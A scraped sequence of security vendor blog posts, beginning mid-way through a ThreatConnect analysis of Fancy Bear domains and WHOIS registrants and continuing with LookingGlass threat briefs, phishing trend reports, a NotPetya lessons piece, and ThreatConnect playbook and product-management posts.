1f2a652a68f9ae6a241aed55d80597222d6c2b21 1/13/17 9:16 evbrax[.]org
bd4255444ba646796c16e967ec0aa1dd95a7a0f2 1/13/17 7:22 wsusconnect[.]com
09ab2ae3ff9f175c18786656194a81be5d6ff732 12/21/16 9:35 gtranm[.]com
010e271b2c860caba78475f02edcd30d7a896383 12/15/16 9:57 reportscanprotecting[.]org
513587ce94be7d70b1f6661f22758ec6fd591d11 11/30/16 8:03 runvercheck[.]com
8dc11f57d69a5583b196c28a9cf816e10a3fa327 11/30/16 7:47 noticermk[.]com
46ce0b05f302e0d855e9cc751100299345466581 11/30/16 7:35 remsupport[.]org
edb4339cdfa0b43d8ef5fb49cc9fdcbbbf2208be 11/25/16 7:30 globaltechresearch[.]org
0153d822178cd0f0725a9a1438d5b2a49edfe71a 11/17/16 6:09
d1a1d61806513cde9b2f8d817a55cc16384f490f 11/11/16 9:35 applecloudupdate[.]com
9d54194ba9140c148b8b3eb900dfb7b11ec155e2 11/10/16 8:00 joshel[.]com
9baf76a0a3a4ce78d3c2ce04e64cae0ea604c7aa 10/31/16 9:20 akamaisoftupdate[.]com
7dcf45941d734b4c42c9a1f90d57e1c816610dff 10/26/16 7:57 ppcodecs[.]com

10/24/16 8:22 appservicegroup[.]com
c201e616fe90ae2592c34de03611748510aba143 9/13/16 5:33 dateosx[.]com
f6ac5bd6aa52d96d8d413157fbfd1a6be7f65cb7 9/9/16 13:27 dowssys[.]com
5be56e0660a001a12c8ef250ff86369c50ca73a8 8/18/16 12:32 microsoftstoreservice[.]com
ea8e4e7882a116ed43db4e5218efb2fd3ba2d116 7/20/16 6:56 microsoftdccenter[.]com
c3b7df9d2a4eb05d399c336eec4c6ff0688596bd 7/12/16 6:12 mvsband[.]com
c5ec8bb4bb5842930da935e13b9bee604e3b6182 7/8/16 7:54 dvsservice[.]com
f65d9f8f385cf384cee24a6d04df600d575dd5f6 7/8/16 7:09 akamaitechupdate[.]com
7d5eaecc2c6865a1f846d03b6d3e0b649a36c2c1 6/1/16 7:35


Once that we had a list of the domains, we further enriched this information by identifying the WHOIS information for these domains. Doing so provided historical information on how these domains were registered.



Gathering Intelligence: Layering on WHOIS Data

To do so, we used some capabilities and integrations from our friends at DomainTools. Specifically, we were looking to identify registrant email addresses, name servers/hosting providers, and creation timestamps. We started by doing a DomainTools Iris search for the domains listed above.

DomainTools Iris search for identified domains.


This provided the current WHOIS information for those domains. However, some of the domains have been taken over since they were operational or the WHOIS has otherwise changed since it was registered for use in operations. For any domains where we thought this was the case, we reviewed the WHOIS history in our DomainTools Spaces app to identify the original registration information that corresponds to the timeframe in which the domain was operational.

ThreatConnect's DomainTools Spaces App WHOIS history for adobeupdatetechnology[.]com.


Ultimately, we identified the below registration information for these domains.


Domain Original Registrant Original Nameserver Create Date Create Time
webversionact[.]org Private registration NS-CANADA.TOPDNS.COM 2/14/18 7:44:16
cdnverify[.]net declan.jefferson@sapo[.]pt 1/31/18 7:58:54
nomartung[.]org Private registration NS-CANADA.TOPDNS.COM 1/17/18 3:10:21
mdcrewonline[.]com htomary@cock[.]li 12/21/17 13:19:00
supservermgr[.]com Private registration NS-CANADA.TOPDNS.COM 12/21/17 7:58:00
europehistoricalmuseum[.]com Private registration 10/26/17 2:22:36
vermasterss[.]com reynoso89@cock[.]li 10/25/17 8:24:14
webviewres[.]net Private registration 10/25/17 8:23:14
funnymems[.]com Private registration 10/24/17 11:11:37
satellitedeluxpanorama[.]com Private registration 10/20/17 11:25:22
space-delivery[.]com elbertnagel@cock[.]li 10/9/17 9:22:13
nanetsdeb[.]com gabrielromao@sapo[.]pt 9/29/17 5:53:25
fastphotobucket[.]com Private registration 9/28/17 14:13:26
myinvestgroup[.]com loisoji@firemail[.]cc 9/28/17 9:27:23
travelbern[.]com k0koth@sapo[.]pt 9/12/17 11:00:44
rapidfileuploader[.]org Private registration NS-CANADA.TOPDNS.COM 7/11/17 13:27:47
viters[.]org Private registration 7/6/17 13:08:10
mvtband[.]net Private registration 6/27/17 8:57:22
wmdmediacodecs[.]com istakav@cock[.]li 3/31/17 12:18:37
spelns[.]com Private registration 3/22/17 18:28:42
lgemon[.]org ezgune@cock[.]li STVL113289.MERCURY.OBOX-DNS.COM 1/31/17 11:43:39
lowprt[.]org avramberkovic@centrum[.]cz NS4.ITITCH.COM 1/20/17 12:48:37
acrobatportable[.]com jul_marian@centrum[.]cz 1/12/17 9:23:47
evbrax[.]org kern82@gmx[.]net 1/10/17 8:48:43
gtranm[.]com wee7_nim@centrum[.]cz 12/14/16 8:54:26
reportscanprotecting[.]org abor.g.s@europe[.]com 12/3/16 9:43:29
runvercheck[.]com cauel-mino@centrum[.]cz 11/25/16 12:11:35
remsupport[.]org ja.philip@centrum[.]cz 11/25/16 11:08:16
noticermk[.]com frfdccr42@centrum[.]cz 11/24/16 12:45:47
globaltechresearch[.]org morata_al@mail[.]com 11/21/16 11:23:40
joshel[.]com germsuz86@centrum[.]cz 11/9/16 14:18:09
applecloudupdate[.]com ll1kllan@engineer[.]com 11/4/16 1:09:13
akamaisoftupdate[.]com mahuudd@centrum[.]cz 10/27/16 13:23:20
wsusconnect[.]com laurent1983@mail[.]com 10/27/16 11:22:42
apptaskserver[.]com partanencomp@mail[.]com 10/22/16 11:26:00
appservicegroup[.]com olivier_servgr@mail[.]com 10/19/16 8:27:30
ppcodecs[.]com chpiost8n@post[.]com 10/19/16 7:36:39
dateosx[.]com milimil0702@mail[.]com 9/13/16 10:12:31
dowssys[.]com adam_corbett@mail[.]com 9/8/16 12:38:29
mvsband[.]com iflatley@openmailbox[.]org 8/24/16 13:38:02
microsoftstoreservice[.]com craft030795@mail[.]com 8/19/16 8:47:21
microsoftdccenter[.]com Private registration 7/20/16 12:51:42
dvsservice[.]net pirlo.vasces@mail[.]com 7/11/16 9:48:23
dvsservice[.]com fernando2011@post[.]com 7/5/16 14:55:25
akamaitechupdate[.]com guiromolly@mail[.]com 6/21/16 7:49:25
adobeupdatetechnology[.]com best.cameron@mail[.]com 5/30/16 14:24:25


We have shared this information, including the domains, IPs, and email addresses, with our Common Community in Incident 20180209C: "C=GB, ST=London, L=London, O=Security, OU=IT" Certificate Infrastructure.


Assessing Tactics

There are Fancy Bear tactics that we can glean and proactively exploit to identify their activity going forward in addition to monitoring for new domains/IPs that use the aforementioned SSL certificate subject string.

Hosting Service Providers/Name Servers
The domains' original name servers helps identify the hosting service providers that the actors used to procure the infrastructure. These include several providers that we've previously called out, such as Domains4Bitcoins, ITitch, Nemohosts, Carbon2u and NJALLA. We can proactively monitor for newly registered domains using these name servers and with other consistencies to Fancy Bear to potentially identify their infrastructure before it is used in operations.

Email Addresses

We used DomainTools Reverse WHOIS to search for any additional domains registered using the email addresses above. As it turns out, only one of the email addresses -- iflatley@openmailbox[.]org -- registered a second domain (rndversion[.]net). This minimal reuse of email addresses suggests an operational security (opsec) effort to deter efforts to trace out their infrastructure based on known registrants.

DomainTools Reverse WHOIS results for iflatley@openmailbox[.]org.


While some of the domains were registered using privacy protection services, for those that aren't we see the consistent use of sapo[.]pt, cock[.]li, centrum[.]cz, and mail[.]com. For those email domains that are less common, like cock[.]li, we can create a Track in ThreatConnect that will alert us to any new domains registered using that email domain.


Creating a Track in ThreatConnect.

Opsec Mistakes

When reviewing the SSL certificates, we identified several possible opsec mistakes that would either arouse suspicion or allow defenders to trace out some of their infrastructure. As we mentioned earlier, the common name in the SSL certificate field is intended to correspond to the domain name where it is being used; however, for ten of the identified certificates, that wasn't the case. In some cases, the domain name was misspelled, like the below certificate for cdnverify[.]net. This mistake would be a red flag for defenders looking to verify the legitimacy of encountered domains based on their SSL certificate.

Censys SSL certificate information for 43df735cfea482ffc27252ae08c94f359c499f69.


In other certificates, a completely different common name was used, as was the case for the aforementioned ecitcom[.]net. It turns out that ecitcom[.]net was the specified common name for five of the certificates listed above. When we search Censys for other certificates using that common name, we find four more certificates that were created from February 2016 to September 2016. This helps us identify the additional infrastructure 51.254.158[.]57, dowstem[.]com,,, and Researchers can exploit mistakes like these to expand their understanding of adversary infrastructure.


Creation Timestamps

Finally, we can make use of the creation timestamps for the identified certificates and domains. As the chart below shows, a large majority of the certificates and domains were registered between 0600 and 1400 GMT. This is consistent with a 0900 to 1700 standard work day in Moscow. While not definitive -- other countries in the Middle East, Eastern Europe, and Western Africa are in the same timezone -- in conjunction with the previous associations to Fancy Bear this finding increases our confidence in the attribution to Fancy Bear.


Chart showing the number of domains and SSL certificates that were created by hour relative to Moscow's time zone (MSK).


The registration and certificate creation times is of limited use to identify additional Fancy Bear domains proactively - especially for a single indicator - but the consistency of the data set over time has value for defenders and researchers.


Conclusion: To the Citadel!

We are sometimes asked why we share out these findings publicly, the argument being that we are revealing research methodologies that Fancy Bear can now incorporate into their opsec and avoid in future operations. That's a fair concern, but in response we argue that by publicizing these findings and methodologies, we are hoping to show our readers ways to research not only Fancy Bear, but the other Night Kings that keep them up at night.


Additionally, as we've stated before, in publicly outing or sharing these indicators and tactics, organizations can ultimately increase the actors' costs and push them to spend more time and resources on procuring infrastructure. The more this is done, the better. Eventually, you might get to the point where you become a factor in the actor's decision making or cost benefit analysis.

Samwell Tarley's main source of intelligence, Castle Black's library, ultimately proves to be insufficient for determining how to best the Night King. He then travels to the Citadel, a huge library of intelligence consolidated from a variety of sources, in hopes of garnering knowledge that will help defend the realm. For threat intelligence researchers and cybersecurity personnel, ThreatConnect acts as a metaphorical Citadel, consolidating, aggregating, and analyzing intelligence from a range of internal and external sources. However, whereas the maesters at the Citadel seem unencumbered by what happens outside of Oldtown, ThreatConnect gives users the ability to actually act on the intelligence they receive and integrate with the defensive tools they have in place to mitigate their threats. If you want to learn more, check out our platform.


ThreatConnect Dashboard showing users recent intelligence from our Citadel on Fancy Bear.

The post A Song of Intel and Fancy appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

NotPetya’s Challenge? Re-Prioritize Your Information Security

The damaging wiper attack last June carried a clear message for global organizations: you need to re-prioritize your security spending.

About a month after the NotPetya malware outbreak in late June, 2017, I was on the phone with someone I’ll call “Stacy,” who worked for a freight forwarding firm in the U.S. At the time we spoke, Stacy was desperate to locate a very important piece of equipment known as a “blow out preventer” (or BPO) that her company had contracted to ship to a customer in Norway for use on one of the offshore oil platforms there.  At the time, the BPO had gone missing. That is surprising, if you’ve ever seen one. They’re massive pieces of equipment that get trucked around on 40-foot flatbed trucks.

Stacy knew where her shipment was: sitting on the dock in Bremerhaven, Germany, where it had landed right around the time NotPetya, began spreading on June 27th. The problem was that her shipping company, A.P. Møller-Maersk, didn’t. Instead, it was scrambling to respond to the attack.

We now know that, behind the scenes, Maersk’s IT staff mounted a heroic effort: reinstalling over 4,000 servers, 45,000 PCs, and 2500 applications over the course of ten days in late June and early July 2017, according to statements by that company’s CEO at the World Economic Forum in Davos in January. The virus cost Maersk more than $300 million dollars to recover.   But the effects of the crippling attack rippled out to companies large and small, as well. Stacy’s firm had to spend money having the blowout preventer surveyed in Bremerhaven to make sure it was not damaged by sitting on the dock. Firms that were lined up to transport the part to the offshore rig in late June also lost business. The oil rig the part was destined for was kept idle waiting for the part’s arrival. The cost to the global economy are unknown – but are certain to total billions – if not hundreds of billions of dollars.

What is the moral of this story for executives at firms like Stacy’s? Not falling for the next NotPetya means figuring out what those weaknesses were and addressing them. But it also requires firms to stay ahead of threats so that they can anticipate new attacks, not merely respond to them.

What were NotPetya’s lessons? Here are some to consider:

Reimagine your risk

Conventional wisdom has been that cyber attacks – though disruptive- are manageable. Outbreaks like NotPetya and WannaCry challenge that established wisdom.

Both attacks were not merely disruptive but destructive: wiping out systems they infected, rather than simply hijacking them or holding their data ransom. The operational impact on the affected companies was severe. Maersk, for example, was forced to revert to pen and paper to run its business for days while it rebuilt its IT systems from scratch.

“Imagine a company where a ship with 20,000 containers would enter a port every 15 minutes, and for ten days you have no IT,” CEO Snabe said at Davos.

The lesson for your firm is clear: you need to reimagine the risks to your firm and its operations. In addition to formulating clear contingency plans for major outbreaks (robust, offsite backup and recovery plans certainly beat pen and paper), your firm should re-evaluate its assumptions about worst case scenarios as it weighs current and future information security investments and add some zeros to the “cost of doing nothing.”

Think holistically about threats to your organization

Maersk wasn’t the only global firm affected by NotPetya. FedEx suffered by way of its TNT Express acquisition. US-based Mondelez candy and the drug giant Merck were also hit hard by the virus.  What’s interesting is that none of these firms were intended targets of NotPetya. Rather: they were collateral damage of an attack that experts believe was a Russian-backed campaign designed to disrupt Ukraine’s government and economy.

The moral? Instability in one part of the world (say: the rolling cyber conflict between Russia and Ukraine) can easily spill over national borders in ways that are unpredictable. Maersk’s CEO called his company an “accidental victim” of a nation-state attack. And that’s just about right. The consequence of this is that organizations cannot be too narrowly focused on known threats.

Quality threat intelligence from a reliable provider can help, but you also need to be able to integrate that threat intelligence into your IT operations and information security workflow. An example: NotPetya spread rapidly within corporate networks because it was married to powerful, Windows based exploits known as “Eternal Romance” and “Eternal Blue.” Threat intelligence noting that both nation-state actors and cyber criminal “ransomware” groups were actively leveraging those exploits should have escalated patching and remediation efforts internally. Better patching would have stopped or limited the spread of NotPetya, greatly reducing its operational impact.

Prioritize third party risk

A clear lesson of NotPetya is that third party risk is real and that companies and Boards of Directors need to pay a lot more attention to it.

How so? One of NotPetya’s initial avenues of infection was via a Ukrainian maker of financial software, M.E. Docs. That company, which had been compromised by hackers, unwittingly distributed a signed software update that installed the malware. More than 2,000 firms in Ukraine alone found themselves infected.

Should the presence of an application by a Ukrainian firm on your network raise alarms? Possibly. Especially when coupled with threat intelligence about similar efforts by nation-state actors to infiltrate and disrupt Ukrainian firms. A more holistic approach would merely be to assess the many software and hardware supply chains your firm relies on and the risk and possible consequences of any supply chain attack, then introduce processes that mitigate such risks internally.


Paul Roberts is the Editor in Chief at The Security Ledger. You can follow him online at: @paulfroberts and @securityledger.

The post NotPetya’s Challenge? Re-Prioritize Your Information Security appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 13, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“Japanese game developer Nippon Ichi Software (NIS) has suffered a major data breach and is offering customers, er, $5 as compensation. In an email sent to customers last week, NIS admitted that its American arm had fallen victim to a breach compromising the personal and financial data of its online customers. While it’s unclear how many customers have been affected, NIS has confirmed that the breach took place between 3 January and 26 February and affected two of its online stores, which have since been taken offline. However, during that time frame, hackers were able to make off with customers payment card details, email address and address information, although NIS has said that those who ordered using PayPal have not been affected. NIS noted that it does not store customers’ payment card information and that user accounts are used “primarily to track past orders and gain rewards points.” Data for past orders is stored securely and will only show the last four digits of a credit card, and will not show the CVV security code or expiration date,” NIS said. NIS is recommending, naturally, that all customers change their passwords immediately and check their card statements for any suspicious activity.”

 –The Inquirer


“A new analysis of industrial control components used by utilities indicated 61 percent of them could cause “severe operational impact” if affected by a cyberattack. The research from cybersecurity firm Dragos, as reported by The Daily Beast, looked at 163 new security vulnerabilities that came to light last year. So far, 72 percent of the vulnerabilities have no known way to be closed. However, only 15 percent of the vulnerabilities are accessible from the outside, with the rest requiring the attacker to have already gained access to a plant operations network. The majority of the security holes are in equipment that are already tightly secured in other ways. The report by Dragos, which covers an array of potential cybersecurity threats worldwide, notes Russian hackers caused an electrical outage in Ukraine over a year ago, and North Korea may be looking to do the same in the United States. Currently, malware known as Covellite is attacking electric utilities in the United States, Europe and parts of east Asia with spear-phishing attacks.”

Power Engineering

Operational Risk

“A security firm, the Romanian Police, and Europol allegedly gained access to the GandCrab Ransomware’s Command & Control servers, which allowed them to recover some of the victim’s decryption keys. This allowed researchers to release a tool that could decrypt some victim’s files. After this breach, the GandCrab developers stated that they would release a second version of GandCrab that included a more secure command & control server in order to prevent a similar compromise in the future. Researchers have since discovered that GandCrab version 2 was released, which contains changes that supposedly make it more secure and allow us to differentiate it from the original version.”

Bleeping Computer

Reputational Risk

“Intel has issued updated microcode to help safeguard its Broadwell and Haswell chips from the Spectre Variant 2 security exploits. According to Intel documents, an array of its older processors, including the Broadwell Xeon E3, Broadwell U/Y, Haswell H,S and Haswell Xeon E3 platforms, have now been fixed and are available to hardware partners. The company’s new microcode updates come a week after Intel also issued updates for its newer chip platforms like Kaby Lake, Coffee Lake and Skylake. The Spectre and Meltdown defects, which account for three variants of a side-channel analysis security issue in server and desktop processors, could potentially allow hackers to access users’ protected data. Meltdown breaks down the mechanism keeping applications from accessing arbitrary system memory, while Spectre tricks other applications into accessing arbitrary locations in their memory. According to Intel’s documentation, the Spectre fixes for Sandy Bridge and Ivy Bridge are still in beta and are being tested by hardware partners.”

 – BBC

The post Weekly Threat Intelligence Brief: March 13, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 12, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from March 4 –  11, 2018.

This week, we saw a large increase in overall phishing activity – 50% – for the top 20 brands we monitor. With the largest increase in activity being from Internet Search & Navigation Services and the largest decrease being from Computer Hardware. Only two industries saw decreases in phishing this week.

The top 5 industries that saw an increase in phishing activity this week:

  1. Internet Search & Navigation Services (>180%)
  2. Telecommunications (>125%)
  3. Storage & Systems Management Software (>65%)
  4. Computer Software (>45%)
  5. eCommerce (>30%)


The top 2 industries that saw a decrease in phishing activity this week: 

  1. Computer Hardware (>80%)
  2. Electronic Payment Systems (>15%)


By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.

The post Weekly Phishing Report: March 12, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Thwart Cyber Attackers by Inverting Your Strategy

When it comes to your organization’s cybersecurity, there is no “one size fits all” solution. In the face of today’s dynamic threats – bad actors constantly find new and innovative ways to circumvent existing security apparatuses – many organizations are struggling to get ahead of an attack.

Yes, the more you know – what adversaries are operating in the space, the techniques and procedures leveraged by them, and the tools and vulnerabilities used and exploited to ensure that their efforts yield success – the better positioned you are to defend your assets. However, have you ever thought about approaching this from what we call an “effects-based” approach – looking at the end game of an action as your starting point? By doing so, you’ll better understand the larger cyber threat landscape, and where your organization falls within it.

Initially a military concept, Effects-Based Operations (EBOs) systemically evaluate incidents (such as a major hack) through the lens of strategic centers of gravity — leadership, key essentials, infrastructure, population and military forces. EBOs look at the totality of the system being acted upon and determine the most effective means to achieve the desired end state.

It puts the attackers’ “bottom line” – in this case, their intended consequence – upfront with the purpose of analytically working back from that point to the perpetrator rather than the other way around. This allows network defenders to investigate how current tactics employed by hackers would work against their organization. In addition, security teams can explore other venues not yet compromised (but could be) to identify future threat trending.

Toward this end, security teams can look at the impact of cyber incidents within their respective industries and verticals to begin understanding how and why hostile actors are implementing specific attacks – and what they may look for in targeting their organization.

Recognizing the latter (i.e. data exfiltration or disruptive attacks), rather than focusing on the means and manners in which these objectives are carried out, enable network defenders to identify the causal linkages between such incidents, adding to their core knowledge base of attackers and their operations.

Examples of effects-based trends include infrastructure impedance such as those resulting from distributed denial-of-service (DDoS) attacks; influence schemes (e.g. the suspected Russian hacking of the Democratic National Convention and state voter registration systems); data aggregation typically associated with cyber espionage; “false flag” operations in which adversaries purposefully leave data to implicate another source; and cyber-informed kinetics.

In a domain that continues to favor attackers, network defenders must find any advantage they can to compete against an adversary. An Effects-Based Operation for cybersecurity complements conventional strategies. With this, security teams sift through the volume of looming threats, identifying those that are most pertinent to their enterprise’s interests. This prepares them not only for the near term, but the future as well.

At LookingGlass, we provide clients with a suite of products and services that deliver unified threat protection against sophisticated cyber attacks. If you’d like to learn more about what we can do for your organization, please contact us.


The post Thwart Cyber Attackers by Inverting Your Strategy appeared first on LookingGlass Cyber Solutions Inc..

Weekly Threat Intelligence Brief: March 7, 2018

This weekly brief highlights the latest threat intelligence news to provide insight into the latest threats to various industries.


“According to a Quick Heal report released on Monday, in 2017 their Security Labs detected over 930 million Windows malware that targeted individuals and businesses. The year was dominated by several exploits leaked by the hacker Group “The Shadow Brokers” such as EternalBlue, EternalChampion, EternalRomance and EternalScholar which were responsible for advanced ransomware campaigns such as WannaCry and Notpetya, and a few cryptocurrency mining campaigns. Sanjay Katkar, Joint Managing Director and Chief Technology Officer of Quick Heal Technologies Limited said that the problem of ransomware is going to exacerbate because of growing availability of exploit kits and ransomware-as-a-service.”


Information Security Risk

“A newly uncovered form of Android malware secretly steals sensitive data from infected devices – including full audio recordings of phone calls – and stores it in cloud storage accounts. An invasive form of spyware, RedDrop harvests information from the device, including live recordings of its surroundings, user data including files, photos, contacts, notes, device data and information about saved Wi-Fi networks and nearby hotspots. The first time the malware was seen, it was being distributed via a Chinese language adult content app called CuteActress, but others target those speaking English and other languages. “This is very much a global operation,” a security research reported.”


Operational Risk

“An endpoint security firm has spotted a massive campaign that exploits a recently patched Adobe Flash Player vulnerability to deliver malware. The flaw in question, CVE-2018-4878, is a use-after-free bug that Adobe patched on February 6, following reports that North Korean hackers had been exploiting the vulnerability in attacks aimed at South Korea. The threat group, tracked as APT37, Reaper, Group123 and ScarCruft, has been expanding the scope and sophistication of its campaigns. After Adobe patched the security hole, which allows remote code execution, other malicious actors started looking into ways to exploit CVE-2018-4878.”

Security Week


“Intel has issued updated microcode to help safeguard its Broadwell and Haswell chips from the Spectre Variant 2 security exploits. According to Intel documents, an array of its older processors, including the Broadwell Xeon E3, Broadwell U/Y, Haswell H,S and Haswell Xeon E3 platforms, have now been fixed and are available to hardware partners. The company’s new microcode updates come a week after Intel also issued updates for its newer chip platforms like Kaby Lake, Coffee Lake and Skylake. The Spectre and Meltdown defects, which account for three variants of a side-channel analysis security issue in server and desktop processors, could potentially allow hackers to access users’ protected data. Meltdown breaks down the mechanism keeping applications from accessing arbitrary system memory, while Spectre tricks other applications into accessing arbitrary locations in their memory. According to Intel’s documentation, the Spectre fixes for Sandy Bridge and Ivy Bridge are still in beta and are being tested by hardware partners.”


The post Weekly Threat Intelligence Brief: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Weekly Phishing Report: March 7, 2018


The following data offers a snapshot into the weekly trends of the top industries being targeted by phishing attacks from February 25 – March 3, 2018.

This week, we saw a large decrease in overall phishing activity – 39% – for the top 20 brands we monitor. With the largest increase in activity being from Telecommunications and the largest decrease being from eCommerce. Only three industries saw increases in phishing this week.

The top 3 industries that saw an increase in phishing activity this week:

  1. Telecommunications (>40%)
  2. Internet Information Services (>30%)
  3. Computer Hardware (>1%)


The top 5 industries that saw a decrease in phishing activity this week: 

  1. eCommerce (>62%)
  2. Internet Search & Navigation Services (>60%)
  3. Computer Software (>45%)
  4. Storage Systems & Management Software (>35%)
  5. Electronic Payment Systems (>28%)


By pulling information from major Internet Service Providers (ISP), partners, clients, feeds, and our own proprietary honey pots and web crawlers, we are able to get a 360-degree view of the phishing landscape. The percentages posted are based on the sum of the phishing threats of the top 20 brands, and do not include anything below the top 20 threshold.

The post Weekly Phishing Report: March 7, 2018 appeared first on LookingGlass Cyber Solutions Inc..

Query a Host or URL Indicator in’s Wayback Machine

One-Click querying of the Wayback Machine

See if a website has been archived in the Wayback Machine

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

When investigating phishing pages it can be helpful to see what a malicious website looks like. This can help you identify what organization the phishing page is spoofing and possibly whether or not a phishing kit is being used. Sometimes, however, the phishing page is taken down before an analyst gets a chance to see what it looked like.'s Wayback Machine can be helpful in these cases as it allows anyone to archive a snapshot of a website. This playbook allows you to check if a Host or URL Indicator has already been archived in the Wayback Machine.

One-click querying of the Wayback Machine

This playbook is triggered with a User Action Trigger available on the page for all Host and URL Indicators.

Once triggered, the playbook queries's Wayback Machine to see if the domain exists. If a domain exists, it will return a link to the archived website. Otherwise, it will let you know that the indicator has not yet been archived.

This playbook requires no configuration. Just install and turn it on!

The post Query a Host or URL Indicator in's Wayback Machine appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Practical Tips for Creating and Managing New Information Technology Products

This cheat sheet offers advice for product managers of new IT solutions at startups and enterprises. To print it, use the one-page PDF version; you can also edit the Word version to customize it for you own needs.

Responsibilities of a Product Manager

  • Determine what to build, not how to build it.
  • Envision the future pertaining to product domain.
  • Align product roadmap to business strategy.
  • Define specifications for solution capabilities.
  • Prioritize feature requirements, defect correction, technical debt work and other development efforts.
  • Help drive product adoption by communicating with customers, partners, peers and internal colleagues.
  • Participate in the handling of issue escalations.
  • Sometimes take on revenue or P&L responsibilities.

Defining Product Capabilities

  • Understand gaps in the existing products within the domain and how customers address them today.
  • Understand your firm’s strengths and weaknesses.
  • Research the strengths and weaknesses of your current and potential competitors.
  • Define the smallest set of requirements for the initial (or next) release (minimum viable product).
  • When defining product requirements, balance long-term strategic needs with short-term tactical ones.
  • Understand your solutions key benefits and unique value proposition.

Strategic Market Segmentation

  • Market segmentation often accounts for geography, customer size or industry verticals.
  • Devise a way of grouping customers based on the similarities and differences of their needs.
  • Also account for the similarities in your capabilities, such as channel reach or support abilities.
  • Determine which market segments you’re targeting.
  • Understand similarities and differences between the segments in terms of needs and business dynamics.
  • Consider how you’ll reach prospective customers in each market segment.

Engagement with the Sales Team

  • Understand the nature and size of the sales force aligned with your product.
  • Explore the applicability and nature of a reseller channel or OEM partnerships for product growth.
  • Understand sales incentives pertaining to your product and, if applicable, attempt to adjust them.
  • Look for misalignments, such as recurring SaaS product pricing vs. traditional quarterly sales goals.
  • Assess what other products are “competing” for the sales team’s attention, if applicable.
  • Determine the nature of support you can offer the sales team to train or otherwise support their efforts.
  • Gather sales’ negative and positive feedback regarding the product.
  • Understand which market segments and use-cases have gained the most traction in the product’s sales.

The Pricing Model

  • Understand the value that customers in various segments place on your product.
  • Determine your initial costs (software, hardware, personnel, etc.) related to deploying the product.
  • Compute your ongoing costs related to maintaining the product and supporting its users.
  • Decide whether you will charge customers recurring or one-time (plus maintenance) fees for the product.
  • Understand the nature of customers’ budgets, including any CapEx vs. OpEx preferences.
  • Define the approach to offering volume pricing discounts, if applicable.
  • Define the model for compensating the sales team, including resellers, if applicable.
  • Establish the pricing schedule, setting the priced based on perceived value.
  • Account for the minimum desired profit margin.

Product Delivery and Operations

  • Understand the intricacies of deploying the solution.
  • Determine the effort required to operate, maintain and support the product on an ongoing basis.
  • Determine for the technical steps, personnel, tools, support requirements and the associated costs.
  • Document the expectations and channels of communication between you and the customer.
  • Establish the necessary vendor relationship for product delivery, if necessary.
  • Clarify which party in the relationship has which responsibilities for monitoring, upgrades, etc.
  • Allocate the necessary support, R&D, QA, security and other staff to maintain and evolve the product.
  • Obtain the appropriate audits and certifications.

Product Management at Startups

  • Ability and need to iterate faster to get feedback
  • Willingness and need to take higher risks
  • Lower bureaucratic burden and red tape
  • Much harder to reach customers
  • Often fewer resources to deliver on the roadmap
  • Fluid designation of responsibilities

Product Management at Large Firms

  • An established sales organization, which provides access to customers
  • Potentially-conflicting priorities and incentives with groups and individuals within the organization
  • Rigid organizational structure and bureaucracy
  • Potentially-easier access to funding for sophisticated projects and complex products
  • Possibly-easier access to the needed expertise
  • Well-defined career development roadmap


Authored by Lenny Zeltser, who’ve been responsible for product management of information security solutions at companies large and small. This cheat sheet, version 1.0, is released under the Creative Commons v3 “Attribution” License.

Playbook Fridays:  Using Playbooks to populate custom attributes

Create Custom Attribute Types and Validation Rules, then use Playbooks to populate them automatically

I was working with a customer who wanted to use ThreatConnect's Task and workflow features like a traditional ticketing system, with a unique identifier for data objects that they could key off of and pass to other teams as needed. This is usually a value, like an "Incident Number" or "Task ID". ThreatConnect has these values and you can see them in the weblink URL for any data object within the Platform. The customer wanted to pass these identifiers to other users/teams/applications, so we decided to use a combination of custom attributes, custom attribute validation rules, and Playbooks to make the data easier to work with, and meet their goals. Along the way we also found that once created and populated, our new attributes were searchable within ThreatConnect.  

In this post, you'll learn how to use the following ThreatConnect features:

  • Create a custom attribute type
  • Create a custom attribute validation rule
  • Use Playbooks to automatically populate the new custom attribute
  • Use the Basic filters on the Browse page to find a record with a specific value in the attribute
  • Use the ThreatConnect Query Language (TQL) and Advanced filters to find records matching a pattern in the attribute

Note: This example could easily be reused for other purposes.

Maybe you want to poll some external data source such as DomainTools and fill an attribute with a retrieved value each time you create a new incident record?  This process will show you how. And, if you have a need for some other custom attribute, the steps taken here will guide you in creating the necessary configuration.

First: for any of the Group data types, ThreatConnect already creates a unique identifier which is visible in the weblink URL:


In this example, we can see an incident with the identifier "672522". This is the single value which identifies this incident within the organization. With this piece of information, we can always track to exactly this single incident. This URL is where we will harvest the identifier, and place it into a new attribute, which we will create.

We'll create the Attribute called a "TC ID Number", and make it available to Group data types such as Adversaries, Incidents, Tasks, and Threats. Rather than call this attribute something like "Incident Number" we'll deliberately keep the name generic so that it is useful across multiple data types. You'll see the value in this decision later in the article.

Before we create the attribute, we will create an Attribute Validation Rule. This will simply validate the data that anyone places into this attribute. In this case, we'll use a simple rule to validate that only digits are entered. We'll call this rule the "TC ID Number validation rule". To create a rule, select "Org Config" in the drop-down menu, and then select "Attribute Validation Rules".  Create a "New" rule, and complete the form as follows:




Save this rule. Now you are ready to create the new attribute. From the same Org Config page, choose the link for "Attribute Types", and then create a "New" attribute. Complete the form as follows:


Notice we are creating an attribute called "TC ID Number". We set a maximum length of 16 characters, and selected several Groups where this attribute may be used. We have also selected our validation rule from the previous step.

This instance of ThreatConnect now has a new attribute available. The obvious question is, how do you put it into action? You can, of course, add this attribute to your Groups manually, one at a time, but what if we applied it automatically whenever the group object is created?

That's where Playbooks comes in!

Following is one of four Playbooks I created to utilize this new attribute. The Playbooks are triggered when a new Group object is created in My Org. The Playbook extracts the identifier from the URL, and stores it in the new attribute. The Playbook looks like this:




